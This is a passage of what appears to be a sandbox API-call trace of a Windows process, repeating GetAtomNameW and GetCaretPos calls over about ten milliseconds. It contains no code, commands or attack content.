lpPoint=0x18ee64) returned 1 [0050.486] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.486] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.487] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.487] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.487] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.487] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.487] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.487] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.487] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.487] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.487] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.487] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.487] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.487] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.487] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.487] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.487] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.487] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.487] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.487] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.487] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.487] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.487] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.487] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.487] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.487] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.487] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.487] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.487] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.487] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.487] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.488] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.488] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.488] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.488] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.488] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.488] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.488] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.488] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.488] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.488] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.488] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.488] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.488] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.488] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.488] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.488] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.488] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.488] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.488] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.488] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.488] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.488] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.488] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.488] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.488] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.488] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.488] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.488] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.488] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.489] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.489] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.489] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.489] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.489] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.489] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.489] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.489] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.489] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.489] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.489] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.489] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.489] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.489] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.489] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.489] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.489] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.489] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.489] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.489] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.489] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.489] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.489] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.489] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.489] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.489] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.489] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.489] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.489] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.489] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.489] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.490] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.490] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.490] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.490] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.490] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.490] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.490] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.490] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.490] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.490] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.490] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.490] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.490] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.490] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.490] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.490] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.490] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.490] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.490] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.490] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.490] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.490] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.490] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.490] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.490] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.490] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.490] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.490] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.490] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.491] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.491] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.491] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.491] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.491] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.491] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.491] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.491] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.491] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.491] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.491] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.491] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.491] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.491] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.491] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.491] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.491] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.491] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.491] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.491] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.491] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.491] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.491] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.491] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.491] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.491] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.491] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.491] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.491] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.491] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.492] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.492] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.492] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.492] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.492] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.492] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.492] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.492] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.492] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.492] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.492] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.492] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.492] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.493] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.493] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.493] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.493] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.493] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.493] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.493] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.493] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.493] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.493] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.493] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.493] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.493] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.493] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.493] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.493] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.493] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.493] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.493] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.493] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.493] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.494] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.494] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.494] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.494] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.494] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.494] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.494] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.494] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.494] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.494] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.494] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.494] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.494] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.494] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.494] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.494] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.494] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.494] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.494] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.494] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.494] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.494] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.494] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.494] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.494] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.494] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.494] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.494] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.494] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.494] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.495] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.495] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.495] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.495] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.495] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.495] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.495] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.495] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.495] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.495] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.495] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.495] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.495] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.495] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.495] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.495] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.495] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.495] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.495] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.495] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.495] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.495] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.495] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.495] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.495] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.495] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.495] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.495] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.495] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.495] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.496] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.496] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.496] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.496] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.496] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.496] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.496] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.496] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.496] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.496] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.496] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.496] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.496] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.496] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.496] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.496] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.496] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.496] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.496] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: 